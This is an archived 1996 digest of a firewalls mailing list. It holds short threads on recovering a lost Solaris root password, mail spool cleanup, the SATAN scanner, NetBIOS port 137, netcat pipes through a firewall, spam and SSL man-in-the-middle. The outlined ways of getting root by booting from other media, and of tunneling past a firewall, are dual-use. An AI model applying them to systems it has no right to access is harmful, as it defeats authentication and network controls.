(8.7.5/8.7.2) with SMTP id NAA04003; Wed, 17 Jul 1996 13:08:35 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607171310.AA52823@pamela.sic.se> Date: Wed, 17 Jul 1996 13:10:52 +0100 From: "Stefan Berg" To: Juyoung Park Cc: firewalls@GreatCircle.com Subject: Re: [HELP] I lost root password! Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Hello, > This is an very emergency state to me! > Someone broken my root password! and make it worse file system > is crashing now! > > I use solaris 2.4, when i used sun os 4.1.3 i can modify root password > by single user mode booting.. > But whenever I try, it asking me root password.. > > Could you help me with this problem? How can I re-obtain root password? > I know my asking for help is not suitable this mailing list. but > nobody can help me.. > > Anyway, tkank you in advance.. You could remove and mount the disk on another Solaris machine, and modify the password field in order to regain root access to the system. /Stefan -- _______________________________________________________ Stefan Berg ISDN Group of Sweden / Svenska InternetCentralen Phone: +46-8-667 7010 Fax: +46-8-667 0610 E-mail: stefan@sic.se WWW: http://www.isdn.se/ http://www.sic.se/ _______________________________________________________ Recursive; adj. see Recursive From firewalls-owner Wed Jul 17 04:33:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA18102 for firewalls-outgoing; Wed, 17 Jul 1996 04:27:55 -0700 (PDT) Received: from smtpgate.saa-cons.co.uk (haddock.demon.co.uk [158.152.16.191]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA18066 for ; Wed, 17 Jul 1996 04:27:40 -0700 (PDT) Received: by smtpgate.saa-cons.co.uk (8.6.8.1/1.3-eef) Received: from haddock.saa-cons.co.uk(193.132.156.161) by amnesiac via smap (V1.3) Received: by haddock.saa-cons.co.uk (AIX 3.2/UCB 5.64/5.00) Date: Wed, 17 Jul 1996 12:27:07 +0100 (BST) From: Dave Roberts To: Low Taek Jho Cc: firewalls Subject: Re: Need some help. In-Reply-To: <199607161355.VAA19736@relay2.jaring.my> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 16 Jul 1996, Low Taek Jho wrote: > space. Any ideas how I could let the mails keep on comming in without my > server deleting it? thanks./. A few years ago, I set up a cron job, which made a cp of the mailbox directory '/var/spool/mail/djr' to a local directory. Then reset the mailbox by cat'ing /dev/null onto it. Then finally gzip -9 the copy of the mailbox file. I used 'date' to give me a different filename every night. It worked ok. Nowadays I use procmail, and when I go away, I set it to compress my folders after filing messages into them. The man pages explain how to do this. The filesystem where my $HOME is, is much bigger than /var/spool/mail. Dave Roberts | "Surfing the Internet" is a sad term for sad people. Unix Systems Admin | Get a board, find a beach, surf some REAL waves and SAA Consultants Ltd | get a *real* life. Plymouth, U.K. | -=[For PGP Key, send mail with subject of "get pgp"]=- From firewalls-owner Wed Jul 17 05:03:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA18971 for firewalls-outgoing; Wed, 17 Jul 1996 04:52:30 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA18964 for ; Wed, 17 Jul 1996 04:52:22 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id HAA03699; Wed, 17 Jul 1996 07:54:38 -0500 From: Adam Shostack Message-Id: <199607171254.HAA03699@homeport.org> Subject: Re: Authentication necessary when encryption ? To: calt@tla.ch Date: Wed, 17 Jul 1996 07:54:38 -0500 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <31ECBFCE.2889@tla.ch> from "Christian ALT" at Jul 17, 96 12:26:22 pm X-Mailer: ELM [version 2.4 PL24 ME8b] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Its a good idea to use strong authentication on connection (something you {have, know, are}, pick any 2), and then use strong cryptographic authentication on a per packet basis. While the attacks (other than denial of service, such as spewing randomgarbage into a session) are somewhat unlikely, and simply using encryption is ***Much*** better than not using it, a crypto hash for authentication is cheap; its unlikely to slow down any connection a laptop makes. The two factor authentication protects you, assuming you tell users to keep their cryptocard in their pocket, not their laptop bag. Adam Christian ALT wrote: | With encryption between a remote user's laptop and the central site, do | you think that authentication is still necessary. This is the point on | which i would like to exchange some thoughts. | | I admit that the encryption keys are unique to any user. | | Authentication is still necessary to access the ressources on the central | site. But no more to access the site itself. | | In case that a laptop get lost, the site can be compromised. This is a | risk we can accept or refuse. | | Any comment on that thought would be appreciated | | | TIA | CHA | | -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Wed Jul 17 05:18:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA19808 for firewalls-outgoing; Wed, 17 Jul 1996 05:16:34 -0700 (PDT) Received: from dsacg1.dsac.dla.mil (dsac.dla.mil [131.78.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA19801 for ; Wed, 17 Jul 1996 05:16:28 -0700 (PDT) Received: by dsacg1.dsac.dla.mil (1.38.193.5/1.40 (DSDC Columbus DSDCG1)) From: nto2584@dsacg1.dsac.dla.mil (Steven C. Payne) Message-Id: <9607171213.AA09135@dsacg1.dsac.dla.mil> Subject: Re: [HELP] I lost root password! To: stefan@sic.se (Stefan Berg) Date: Wed, 17 Jul 96 8:13:12 EDT Cc: firewalls@greatcircle.com In-Reply-To: <9607171310.AA52823@pamela.sic.se>; from "Stefan Berg" at Jul 17, 96 1:10 pm Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > Hello, > > This is an very emergency state to me! > > Someone broken my root password! and make it worse file system > > is crashing now! > > > > I use solaris 2.4, when i used sun os 4.1.3 i can modify root password > > by single user mode booting.. > > But whenever I try, it asking me root password.. > > > > Could you help me with this problem? How can I re-obtain root password? > > I know my asking for help is not suitable this mailing list. but > > nobody can help me.. > > > > Anyway, tkank you in advance.. > boot the machine with the cdrom, or over the net, go through the install procedures, mount the /root file system, modify the shadow file and reboot. this IS documented in the OS docs. spayne From firewalls-owner Wed Jul 17 05:33:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA20254 for firewalls-outgoing; Wed, 17 Jul 1996 05:31:53 -0700 (PDT) Received: from kpgwy.kpscal.org (kpgwy.kpscal.org [167.117.0.140]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA20247 for ; Wed, 17 Jul 1996 05:31:44 -0700 (PDT) Received: from mailhub.kp.org ([206.18.242.135]) by kpgwy.kpscal.org (8.6.9/8.6.9) with SMTP id FAA29450 for ; Wed, 17 Jul 1996 05:29:21 -0700 X400-Received: by /c=us/admd=/prmd=kp/; converted ( IA5-Text); Relayed; X400-Received: by mta KPMTA in /c=us/admd=/prmd=kp/; converted ( IA5-Text); X400-MTS-Identifier: [/c=us/admd=/prmd=kp/; 31ECEA92.CCC8.0C5A.000] Content-Identifier: 0620031ECDCE7009 Content-Return: Allowed X400-Content-Type: P2-1988 ( 22 ) Conversion: Allowed Original-Encoded-Information-Types: IA5-Text Disclose-Recipients: Prohibited Alternate-Recipient: Allowed X400-Originator: Mark.Moore@kp.org X400-Recipients: non-disclosure; Expiry-Date: 01 Aug 1996 00:00: Z Date: 17 Jul 1996 05:30:31 -0700 From: "Moore, Mark" To: firewalls@GreatCircle.COM (Return requested) (Receipt notification requested) Subject: Satan Program MIME-Version: 1.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can some on this list tell me about the Satan program ( i.e. what does it actually do ? ). Also, are there other programs like Satan ? Regards, Mark From firewalls-owner Wed Jul 17 06:03:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA20816 for firewalls-outgoing; Wed, 17 Jul 1996 05:47:02 -0700 (PDT) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA20799 for ; Wed, 17 Jul 1996 05:46:54 -0700 (PDT) Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id OAA04161; Wed, 17 Jul 1996 14:41:46 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607171444.AA03196@pamela.sic.se> Date: Wed, 17 Jul 1996 14:44:03 +0100 From: "Stefan Berg" To: Ian Blenke Cc: firewalls@GreatCircle.com Subject: Re: [HELP] I lost root password! Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ian Blenke wrote: > Booting to CDROM would seem to be the most ideal solution. > You are right, of course. The first thing that came to my mind was when the exakt same thing happened here on a machine without CD-ROM-reader. /Stefan -- _______________________________________________________ Stefan Berg ISDN Group of Sweden / Svenska InternetCentralen Phone: +46-8-667 7010 Fax: +46-8-667 0610 E-mail: stefan@sic.se WWW: http://www.isdn.se/ http://www.sic.se/ _______________________________________________________ Recursive; adj. see Recursive From firewalls-owner Wed Jul 17 06:18:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA21425 for firewalls-outgoing; Wed, 17 Jul 1996 05:56:03 -0700 (PDT) Received: from alma.ipso.net (alma.ipso.net [194.159.46.162]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA21276 for ; Wed, 17 Jul 1996 05:55:34 -0700 (PDT) Received: from hostes.ipso.net (hostes.ipso.net [194.159.46.178]) by alma.ipso.net (8.7.5/IPSO 3.2.0) with SMTP id NAA05172 for ; Wed, 17 Jul 1996 13:52:24 +0100 (BST) Message-Id: <199607171252.NAA05172@alma.ipso.net> Comments: Authenticated sender is From: "Phil Askey" Organization: The IP Systems Operation To: firewalls@GreatCircle.COM Date: Wed, 17 Jul 1996 13:49:34 +0100 Subject: Re: [HELP] I lost root password! Reply-to: phil@ipso.net X-mailer: Pegasus Mail for Win32 (v2.41) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk : > Hello, : > This is an very emergency state to me! : > Someone broken my root password! and make it worse file system : > is crashing now! : > : > I use solaris 2.4, when i used sun os 4.1.3 i can modify root password : > by single user mode booting.. : > But whenever I try, it asking me root password.. : > : > Could you help me with this problem? How can I re-obtain root password? : > I know my asking for help is not suitable this mailing list. but : > nobody can help me.. : > : > Anyway, tkank you in advance.. : : You could remove and mount the disk on another Solaris machine, and modify the : password field in order to regain root access to the system. : Or easier still, just boot up on the Solaris CD, get a miniroot and mount the hard disk up in a temporary directory... Just a thought. Phil -- Phil Askey | mailto:phil@ipso.net Internet Consultant | http://phil.ipso.net Ybir lbh Freran | phone:+44 1223 570496 mobile: 0976 252877 The IP Systems Operation| smail:92 St Barnabas Rd, Cambridge CB1 2DE From firewalls-owner Wed Jul 17 06:44:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA22255 for firewalls-outgoing; Wed, 17 Jul 1996 06:09:54 -0700 (PDT) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA22244 for ; Wed, 17 Jul 1996 06:09:47 -0700 (PDT) Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id PAA04200; Wed, 17 Jul 1996 15:04:40 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607171506.AA57862@pamela.sic.se> Date: Wed, 17 Jul 1996 15:06:57 +0100 From: "Stefan Berg" To: "Moore, Mark" Cc: firewalls@GreatCircle.com Subject: Re: Satan Program Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Mark, Try ftp://ftp.win.tue.nl/pub/security/index.html for more information. Best regards, Stefan -- _______________________________________________________ Stefan Berg ISDN Group of Sweden / Svenska InternetCentralen Phone: +46-8-667 7010 Fax: +46-8-667 0610 E-mail: stefan@sic.se WWW: http://www.isdn.se/ http://www.sic.se/ _______________________________________________________ Recursive; adj. see Recursive From firewalls-owner Wed Jul 17 06:52:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA23830 for firewalls-outgoing; Wed, 17 Jul 1996 06:47:01 -0700 (PDT) Received: from nova.unix.portal.com (nova.unix.portal.com [156.151.1.101]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA23823 for ; Wed, 17 Jul 1996 06:46:55 -0700 (PDT) Received: from jobe.shell.portal.com (jobe.shell.portal.com [156.151.3.4]) by nova.unix.portal.com (8.6.11/8.6.5) with ESMTP id GAA11147 for ; Wed, 17 Jul 1996 06:42:22 -0700 Received: (hfinney@localhost) by jobe.shell.portal.com (8.6.11/8.6.5) id GAA17570 for firewalls@greatcircle.com; Wed, 17 Jul 1996 06:42:21 -0700 Date: Wed, 17 Jul 1996 06:42:21 -0700 Message-Id: <199607171342.GAA17570@jobe.shell.portal.com> To: firewalls@greatcircle.com From: anonymous-remailer@shell.portal.com Subject: Re: Ports 137 & 138 Comments: This message is NOT from the person listed in the From Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 01:22 PM 7/15/96 -0700, you wrote: >I too am curious about port 137. > >My site has no inbound services, only outbound. > >Do some NT websites use port 137 to resolve names? My proxy >logs indicates that some hits on port 137 are in groups >of 3, some from websites. My perusal of denied 137 hits: [snip] NT attempts to use nb name services (udp port 137, unicast) to find out the NetBIOS name of a machine before it attempts reverse DNS in my experience. Those sites are prob. open for attack via NBT (NetBIOS over TCP/IP), although you have to know the NetBIOS name of the machine before it will respond to a NBT SMB query on tcp port 139. Use of port 137 by NT: Unicast UDP: what's your name? Broadcast UDP: here's my name. From firewalls-owner Wed Jul 17 07:11:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA24021 for firewalls-outgoing; Wed, 17 Jul 1996 06:49:41 -0700 (PDT) Received: from stevep.dsdc.dla.mil (stevep.dsac.dla.mil [131.78.6.122]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA24012 for ; Wed, 17 Jul 1996 06:49:31 -0700 (PDT) Received: (from spayne@localhost) by stevep.dsdc.dla.mil (8.7.4/8.7.3) id JAA17173 for firewalls@greatcircle.com; Wed, 17 Jul 1996 09:42:04 -0400 (EDT) From: "Steven C. Payne" Message-Id: <199607171342.JAA17173@stevep.dsdc.dla.mil> Subject: programs hackers use To: firewalls@greatcircle.com Date: Wed, 17 Jul 1996 09:42:04 -0400 (EDT) X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi, I know this is gonna send up flags and maybe create grief, but I am working on compiling a list of things I find suspect on systems (hackers tools) as well as programs that setuid, administratior priveledges, and things equivelent to .netrc, .rhosts. I have quite a few already from hackers I have tracked in the past. (mostly unix) I am looking for things that show up from time to time like crack, etc. I would like anyones input about what they have found, and a brief description on what it does. I would also like to test it if it's possible in a controlled env. I am not doing this on my own, I intend on getting our security folks in on this, and document our findings. Understand you can call one program many names, and I would point this out, for example: crack program to crack passwords kcarc AKA crack, program to crack passwords. I don't want this to be unix specefic, NT specific, or TCP specific. I want it to be generic enough to be used as a "cookbook" for system security. I am also looking into subverting these "hacker tools" like using secure versions of net_progs like finger, stel, wrappers like tcpd, and smap, smapd and smrsh. Where firewalls fit in, turning off wide area mounts, disabling tftp, ip spoofing, etc. Programs to edit the registry in NT, ones that do denial of service and others. I would also like to cover anonymous ftp, the early apache server, portmapper and pcnfsd. I am looking for info on network programs and vulnerabilities and cures. I will compile the list and maybe put it somewhere we can all get it from, or individual mail whichever might be more secure. Or I can provide it to CERT. Is this something everyone would be interested in? Anyway, mail to nomore_hack @ my.site in this msg and if interest is good, I will let everyone know. If it's not good, I will let everyone know. I really just want to snapshot what to be suspicious of and why. NOTE: I know this group is for firewalls but this is also a security group and a great wealth of knowledge exists here. I don't want the voluminous amount of data each system admin has encountered over the years, I can produce that. I want something useful and to the point, and that's why I am posting here. I have looked on CERT's site and found nothing really that goes into detail about what I want, for obvious reasons. thanks spayne From firewalls-owner Wed Jul 17 07:56:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA27091 for firewalls-outgoing; Wed, 17 Jul 1996 07:48:07 -0700 (PDT) Received: from poseidon ([200.10.251.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA27084 for ; Wed, 17 Jul 1996 07:47:59 -0700 (PDT) Received: from [146.21.1.236] by poseidon (AIX 3.2/UCB 5.64/4.03) Message-Id: <1.5.4.16.19960717144601.22cfe8b6@sii.cl> X-Sender: qsherman@sii.cl X-Mailer: Windows Eudora Light Version 1.5.4 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 17 Jul 1996 10:46:01 -0400 To: firewalls@GreatCircle.com From: Quentin Sherman Subject: BorderWare Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi All, I have joined to this mailing list for a couple of months, but I haven't learned anyone talk about "BorderWare" untill now. For the reason of our Internet provider try to sale us this software, I wish to get some comments about it. We have a private network which is connected all our offices and we got a Internet link, we don't have any necessary connection from outside to our inside hosts, but we need some telnet connection to outside. Any help would be appreciated... ------------------------------------------------------------- Quentin Sherman (Qi Xue) Network & Security Consultant Servicio de Impuestos Internos Working Phon: 56-2 6921371 Teatinos 120, Santiago, Chile Working Fax: 56-2 6921501 e-mail: qsherman@sii.cl WWW: http://www.sii.cl ------------------------------------------------------------- From firewalls-owner Wed Jul 17 08:18:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA28452 for firewalls-outgoing; Wed, 17 Jul 1996 08:15:38 -0700 (PDT) Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA28444 for ; Wed, 17 Jul 1996 08:15:29 -0700 (PDT) Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id LAA03336 for ; Wed, 17 Jul 1996 11:12:03 -0400 Message-Id: <199607171512.LAA03336@phoenix.iss.net> Comments: Authenticated sender is From: "Alex F" Organization: Internet Security Systems, Inc. To: firewalls@greatcircle.com Date: Wed, 17 Jul 1996 11:13:12 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Reply-to: alexf@iss.net X-mailer: Pegasus Mail for Win32 (v2.32a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Can some on this list tell me about the Satan program ( i.e. what does it > actually do ? ). Also, are there other programs like Satan ? > > Regards, > > Mark Satan is basically a bunch of PERL scripts that can analyze your machine's security remotely. Other programs that are similar are Pingware NetProbe ISS's Internet Security Scanner Pingware is available from bellcore (try www.bellcore.com or do an Alta-Vista search). I do not know if the other companies allow for evaluation/demo downloads, but you can go to www.iss.net and download a fully functional evaluation copy of our scanner. The dowloaded (free) version does the same checks as the commercial version, the only difference being that it will only scan "localhost." The scanner comes for a few different OSs (AIX, HP-UX, Linux, SunOS, Solaris-SPARC only). More info can be had on our website, including listings/explanations of the vulnerability checks and report examples, etc. Hope this helps, Alex F =-=-=-=-=-=-=-=-=-=-=-=-=- Alex F alexf@iss.net Marketing Specialist Internet Security Systems =-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Wed Jul 17 09:21:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA01131 for firewalls-outgoing; Wed, 17 Jul 1996 09:17:02 -0700 (PDT) Received: from nacg.trane.com (nacg.trane.com [198.80.4.199]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA01124 for ; Wed, 17 Jul 1996 09:16:56 -0700 (PDT) Received: by nacg.trane.com id AA11449 Message-Id: <199607171613.AA11449@nacg.trane.com> Received: by nacg.trane.com (Internal Mail Agent-1); From: "Norton, Dave" To: Firewalls-post Subject: SATAN 1.1.1 Avail? Date: Wed, 17 Jul 96 11:18:00 PDT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I hear that the latest version on SATAN is 1.1.1, and that it is now available. Can anyone tell me where I can obtain it? Thanx... Dave Norton dnorton@trane.com From firewalls-owner Wed Jul 17 09:48:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA02698 for firewalls-outgoing; Wed, 17 Jul 1996 09:44:40 -0700 (PDT) Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA02687 for ; Wed, 17 Jul 1996 09:44:33 -0700 (PDT) Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id MAA04477; Wed, 17 Jul 1996 12:41:22 -0400 Message-Id: <199607171641.MAA04477@phoenix.iss.net> Comments: Authenticated sender is From: "Alex F" Organization: Internet Security Systems, Inc. To: firewalls@GreatCircle.COM, "Steven C. Payne" Date: Wed, 17 Jul 1996 12:42:30 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: programs hackers use Reply-to: alexf@iss.net X-mailer: Pegasus Mail for Win32 (v2.32a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I am looking for info on network programs and vulnerabilities and cures. > I will compile the list and maybe put it somewhere we can all > get it from, or individual mail whichever might be more secure. > Or I can provide it to CERT. > Is this something everyone would be interested in? Visit the "Vulnerability Database" at our web page (www.iss.net). This is something that I work on when I have time (read very little), but I am actively trying to add more stuff every week. Some stuff is old, some is new. Might help, and check it out periodically as new stuff is added. Hope this helps some, Alex F =-=-=-=-=-=-=-=-=-=-=-=-=- Alex F alexf@iss.net Marketing Specialist Internet Security Systems =-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Wed Jul 17 10:23:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA06069 for firewalls-outgoing; Wed, 17 Jul 1996 10:15:46 -0700 (PDT) Received: from portal.east.saic.com (portal.east.saic.com [198.151.13.15]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA06055 for ; Wed, 17 Jul 1996 10:15:39 -0700 (PDT) Received: from leosec.saic.com ([149.8.136.21]) by portal.east.saic.com Received: by leosec.saic.com (5.x/SMI-SVR4) Date: Wed, 17 Jul 1996 13:12:56 -0400 From: dsulser@leosec.saic.com (David Sulser) Message-Id: <9607171712.AA13358@leosec.saic.com> To: firewalls@GreatCircle.com Subject: Re: SATAN 1.1.1 Avail? X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I hear that the latest version on SATAN is 1.1.1, and that it is now > available. Can anyone tell me where I can obtain it? Thanx... > Dave Norton > dnorton@trane.com > Try ftp://ftp.win.tue.nl/pub/security/ Regards, David Sulser From firewalls-owner Wed Jul 17 10:38:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA04860 for firewalls-outgoing; Wed, 17 Jul 1996 10:05:00 -0700 (PDT) Received: from xioa.cosmic.org (xioa.cosmic.org [206.151.181.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA04738 for ; Wed, 17 Jul 1996 10:04:28 -0700 (PDT) Received: (from jwb@localhost) by xioa.cosmic.org (8.6.12/8.6.9) id NAA06134 for Firewalls@GreatCircle.COM; Wed, 17 Jul 1996 13:02:14 GMT From: Joe Beiter Message-Id: <199607171302.NAA06134@xioa.cosmic.org> Subject: Netcat To: Firewalls@GreatCircle.COM Date: Wed, 17 Jul 1996 13:02:09 +0000 () In-Reply-To: <199607160800.BAA28029@miles.greatcircle.com> from "Firewalls-Digest" at Jul 16, 96 01:00:34 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone have any feelings on using netcat to create "pipes" through a firewall situation to port in things like news? We are using two ciscos with a dmz area between them. :---==@==---==@==---==@==---: Joseph Beiter Hacking's just another word for nothing jwb@cosmic.org left to kludge. From firewalls-owner Wed Jul 17 10:48:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA07603 for firewalls-outgoing; Wed, 17 Jul 1996 10:33:34 -0700 (PDT) Received: from santana.vol.it (santana.vol.it [194.20.32.178]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA07561 for ; Wed, 17 Jul 1996 10:33:20 -0700 (PDT) Message-Id: <199607171733.KAA07561@miles.greatcircle.com> Received: by santana.vol.it From: "R.D. Contarino" Subject: Re: SATAN 1.1.1 Avail? To: dnorton@trane.com Date: Wed, 17 Jul 1996 19:28:58 METDST Cc: firewalls@GreatCircle.COM In-Reply-To: <199607171613.AA11449@nacg.trane.com>; from "Norton, Dave" at Jul 17, 96 11:18 am X-Mailer: Elm [revision: 111.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > I hear that the latest version on SATAN is 1.1.1, and that it is now > available. Can anyone tell me where I can obtain it? Thanx... > Dave Norton > dnorton@trane.com > Hi ... try at: http://hpux.cs.utah.edu/hpux/Networking/Admin/satan-1.1.1.html ... or ... if you prefer, use altavista or something else to find what you need. It will return more than 100 sites for a satan-1.1.1 query. Bye. -- R.D. Contarino System Adm. Dpt. - Video On Line Telecom Italia - Italy From firewalls-owner Wed Jul 17 11:06:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA06720 for firewalls-outgoing; Wed, 17 Jul 1996 10:22:01 -0700 (PDT) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA06713 for ; Wed, 17 Jul 1996 10:21:55 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id WAA01285; Tue, 16 Jul 1996 22:16:19 -0700 (PDT) From: Don Lewis Message-Id: <199607170516.WAA01285@salsa.gv.ssi1.com> Date: Tue, 16 Jul 1996 22:16:18 -0700 In-Reply-To: Dave Roberts X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Dave Roberts , Firewalls@GreatCircle.COM Subject: Re: Dirty Dogs on AOL Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Jul 15, 12:25pm, Dave Roberts wrote: } Subject: Re: Dirty Dogs on AOL } On Sun, 14 Jul 1996, Dan Simoes wrote: } } > of problems caused by AOL users. I've found that mailing to } > postmaster@aol.com gets good results in tracking abuses. I've heard that abuse@aol.com is the proper place to report stuff like this. } Oh really? Sorry to sound cynical, but I suppose that has nothing to do } with your mailing address :) } } On another mailing list to which I subscribed, we were pounded with } spams, at least one a day. Firstly, I mailed the postmaster, with a copy } of the headers, and informed them of the problem. I heard nothing. } After a week of spams, I mailed again, pointed out that we now had 7 of } these, and asked *politely* if something could be done about it. etc etc Sounds like Krazy Kevin's magazine spams. Two of the lists I subscribe two were getting hit for a while. The story that I heard that KK would sign up for an AOL account using a fake name, spam a bunch of mail lists, the complaints would roll in, and AOL would cancel the account, but the damage would already be done. Blame AOL's marketing for making this too easy. I heard that AOL was "taking steps", and then the magazine spams stopped, but I never heard what "steps" were taken. --- Truck From firewalls-owner Wed Jul 17 11:13:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA05268 for firewalls-outgoing; Wed, 17 Jul 1996 10:06:24 -0700 (PDT) Received: from ihgw1.att.com (ihgw1.att.com [207.19.48.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA05203 for ; Wed, 17 Jul 1996 10:06:03 -0700 (PDT) From: mdr@vodka.sse.att.com Received: from vodka.sse.att.com by ihig1.att.att.com (SMI-8.6/EMS-1.2 sol2) Message-Id: <199607171614.LAA12175@ihig1.att.att.com> Subject: Re: Extending Financial Applications And Protecting via a Firewall To: allyn@allyn.com (Mark Allyn 206-860-9454) Date: Wed, 17 Jul 1996 12:13:43 -0400 (EDT) Cc: mdr@vodka.sse.att.com, allyn@allyn.com, howzit@worldnet.att.net In-Reply-To: <199607140303.UAA11030@mark.allyn.com> from "Mark Allyn 206-860-9454" at Jul 13, 96 08:03:31 pm X-Mailer: ELM [version 2.4 PL23-upenn2.7] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mark Allyn, I'm trying to make sure that I understand all of this myself. So if I need straigtening out here and get, I'll humbly lick my wounds :) Also, If I came across as attacking your idea, I appologize. Its hard to control the intonation of email. If I could write that one over it would say "Don't forget about certificates! or else ..." My understanding is that _unless_ server certificates are used SSL provides confidentiality but does not prevent DNS spoofing attacks. The point is that encryption alone does not solve the problem. Session hijacking is not a problem at all with SSL, I was describing "man-in-the-middle" which requires DNS spoofing or control of an intermediate network or host. It is similar to session highjacking in that the "middle man" has the power to continue the session after you close. 